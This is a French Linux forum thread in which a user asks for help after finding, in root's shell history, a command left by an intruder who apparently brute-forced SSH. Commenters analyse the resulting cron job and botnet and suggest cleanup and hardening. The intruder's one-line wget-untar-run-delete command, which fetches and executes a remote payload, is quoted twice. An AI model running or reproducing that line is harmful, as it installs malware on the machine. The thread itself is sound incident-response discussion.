J'aimerais vous soumettre un petit problème : en recherchant dans mon historique (root sous debian), je suis tombé sur ça :
wget rocsana4u.webs.com/joke/emech.tgz;tar xvf emech.tgz;rm -rf emech.tgz;cd .joke;./start rdsnet;cd ..;rm -rf .joke
Chose dont je suis sûr n'avoir jamais tappée !!
Un petit google ne m'en apprend pas beaucoup, je suis donc persuadé d'avoir été victime d'intrusion.
J'ai donc imméditement changer mes mots de passe root et utilisateurs.
Cependant, en fouinant un peu, je suis tombé sur ça :
http://www.tux-planet.fr/local-root-exploit-linux-rds-protoc(...)
Est ce en lien ?
Sinon, comment savoir ce qu'a pu faire cette attaque (rien vu dans syslog , auth.log, ???)
Voici ce que j'ai trouvé :
Jan 16 04:32:23 monordi sshd[20758]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=francis.weppc.net user=root
Jan 16 04:32:23 monordi sshd[20758]: pam_winbind(sshd:auth): getting password (0x00000388)
Jan 16 04:32:23 monordi sshd[20758]: pam_winbind(sshd:auth): pam_get_item returned a password
Jan 16 04:32:23 monordi sshd[20758]: pam_winbind(sshd:auth): request wbcLogonUser failed: WBC_ERR_AUTH_ERROR, PAM error: PAM_USER_UNKNOWN (10), NTSTATUS: NT_STATUS_NO_SUCH_USER, Error message was: No such user
Jan 16 04:32:25 monordi sshd[20758]: Failed password for root from 72.34.247.90 port 36132 ssh2
Jan 16 04:32:26 monordi sshd[20761]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=francis.weppc.net user=root
Jan 16 04:32:26 monordi sshd[20761]: pam_winbind(sshd:auth): getting password (0x00000388)
Jan 16 04:32:26 monordi sshd[20761]: pam_winbind(sshd:auth): pam_get_item returned a password
Jan 16 04:32:26 monordi sshd[20761]: pam_winbind(sshd:auth): request wbcLogonUser failed: WBC_ERR_AUTH_ERROR, PAM error: PAM_USER_UNKNOWN (10), NTSTATUS: NT_STATUS_NO_SUCH_USER, Error message was: No such user
Avec un scan sur un grand nombre de ports
En sachant que d'après cet historique celà date de ce week end.
Sinon, tout de suite, je vais régler mon iptables.
Merci à ceux qui auront l'amabilité de m'éclairer.
Chmanu
# analysons
Posté par NeoX . Évalué à 4.
wget rocsana4u.webs.com/joke/emech.tgz
tar xvf emech.tgz
rm -rf emech.tgz
cd .joke
./start rdsnet
cd ..
rm -rf .joke
on comprend qu'il recupere un tgz, le decompresse (ce qui genererait un dossier .joke), puis supprime le tgz.
il entre ensuite dans le dossier .joke
et lance un script ./start rdsnet
puis il ressort du dossier et le supprime
il ne devrait donc plus y avoir que le process en memoire
plus les fichiers que le process pourrait avoir generé.
pour en savoir plus, tu peux telecharger le tgz toi aussi, le decompresser
puis analyser plus finement ce que fait le script "start" quand on lui passe l'option "rdsnet"
[^] # Re: analysons
Posté par chmanu . Évalué à 2.
première chose, il installe une crontab (toutes les minutes) celle était bien présente sur mon système. Ensuite un certain nombre de script se crée pour s'appeler.
Il semblerait que ce soit une attaque ciblée sur nstld.verisign-grs.com. (j'ai fait un dig sur 5 adresses sur 20 d'un fichier, toutes indiquent ce domaine) pour deny de service des binaires sont présents, je ne sais donc pas ce qu'ils font.
En tout cas, celà n'a pas du aller au bout car la crontab lance un script dans /root/.joke et ce répertoire n'existe pas (ls -alrt).
Bon, je fais le ménage, mais reste vigilent.
Merci.
[^] # Re: analysons
Posté par tiot (site web personnel) . Évalué à 3.
[^] # Re: analysons
Posté par chmanu . Évalué à 1.
J'ai sauvé toutes mes logs pour voir à tête reposée, toujours est il que j'ai été victime de force brute, sachant qu'il s'agit juste d'un PC perso et que le mot de passe n'était pas alambiqué.
Tout ce que j'ai de plus pour l'instant est que la cron tourne depuis hier 16:23. Je m'en suis donc aperçu (bêtement) relativement tôt (en retrant du boulot).
[^] # Re: analysons
Posté par chmanu . Évalué à -1.
J'ai sauvé toutes mes logs pour voir à tête reposée, toujours est il que j'ai été victime de force brute, sachant qu'il s'agit juste d'un PC perso et que le mot de passe n'était pas alambiqué.
Tout ce que j'ai de plus pour l'instant est que la cron tourne depuis hier 16:23. Je m'en suis donc aperçu (bêtement) relativement tôt (en retrant du boulot).
# Tu vas t'amuser !
Posté par ze_lionix (site web personnel) . Évalué à 2.
Un petit saut sur le net et voila les infos
http://about-threats.trendmicro.com/Malware.aspx?language=us(...)
A priori c'est pas du résident, mais rien ne prouve que du coup tu ne t'es pas fait ajouté d'autre saletés sur la machine... Par ailleurs la première choses est de commencer par trouver comment tu t'es fait défoncer le compte root !
Ensuite l'idéal étant tout de même une réinstalle de machine si tu ne peux te le permettre ben sort l'artillerie lourde : chkrootkit, debsum, clamav...etc...
Fuse : j'en Use et Abuse !
[^] # Re: Tu vas t'amuser !
Posté par fcartegnie . Évalué à 3.
Le pid est sur:
/tmp/.joke/m.pid
Le nom du process est 'bash'
Mais faut nettoyer le cron avant, la reference qui le réactive est "update"
Par contre, comme bash est un executable, on sait pas ce qu'il a fait ailleurs.
[^] # Re: Tu vas t'amuser !
Posté par peikk0 . Évalué à 9.
[^] # Re: Tu vas t'amuser !
Posté par ze_lionix (site web personnel) . Évalué à 3.
Mais la notion de "je peux pas me le permettre tout de suite" existe...
Genre serveur en cours d'utilisation par un ou X client tiers, avec des applications dont tu n'as pas le MOP de réinstall disponible, des contraintes extérieures ....etc....
Auquel cas tu fais le max de ménage, le max de blindage, de cloisonnement et tu planifies la réinstall ASAP en fonction des contraintes car tu peux pas kickstarter tout de suite...
Fuse : j'en Use et Abuse !
# BotNet
Posté par fcartegnie . Évalué à 1.
Bienvenue dans un BotNet
Le feedback est fait sur irc à son propriétaire.
[^] # Re: BotNet
Posté par fcartegnie . Évalué à 2.
# Nouveau proverbe
Posté par totof2000 . Évalué à 6.
# on peut rajouter...
Posté par zecrazytux (site web personnel) . Évalué à 2.
[^] # Re: on peut rajouter...
Posté par Grunt . Évalué à 2.
THIS IS JUST A PLACEHOLDER. YOU SHOULD NEVER SEE THIS STRING.
[^] # Re: on peut rajouter...
Posté par Le Pnume . Évalué à 3.
[^] # Re: on peut rajouter...
Posté par Grunt . Évalué à 2.
THIS IS JUST A PLACEHOLDER. YOU SHOULD NEVER SEE THIS STRING.
# SSHd
Posté par dest . Évalué à 3.
Enfin, dans tes règles iptables, tu peux mettre un ban de X minutes si une personne se trompe plusieurs fois de mot de passe. J'ai remarqué que c'était assez efficace.
Bon, c'est peut-être pas par SSH que tu t'es fait trouer mais ce sont deux petites conseils que je peux te donner si tu ne les connais pas déjà.
[^] # Re: SSHd
Posté par Romeo . Évalué à 2.
# tail -n 2 /etc/ssh/sshd_config
Match User root
PasswordAuthentication no
[^] # Re: SSHd
Posté par gnumdk (site web personnel) . Évalué à 4.
Sinon, fail2ban (ssh, apache, ...) fait du bon boulot pour bloquer tout activité suspecte.
[^] # Re: SSHd
Posté par Grunt . Évalué à 3.
"Bouge pas, je crée un compte pour les amis de passage comme toi, ça t'évitera de te battre avec Noscript quand t'iras sur Facebook."
Et deux mois plus tard:
"Ho ben ça alors, quelqu'un est entré par le SSH!"
THIS IS JUST A PLACEHOLDER. YOU SHOULD NEVER SEE THIS STRING.
[^] # Re: SSHd
Posté par skiidoo . Évalué à 3.
[^] # Re: SSHd
Posté par fearan . Évalué à 3.
Il ne faut pas décorner les boeufs avant d'avoir semé le vent
[^] # Re: SSHd
Posté par nono14 (site web personnel) . Évalué à 1.
Système - Réseau - Sécurité Open Source - Ouvert à de nouvelles opportunités
[^] # Re: SSHd
Posté par Mathias Bavay (site web personnel) . Évalué à 1.
Évidement, il faut alors toujours avoir sa clef ssh avec soi pour pouvoir se connecter...
Suivre le flux des commentaires
Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.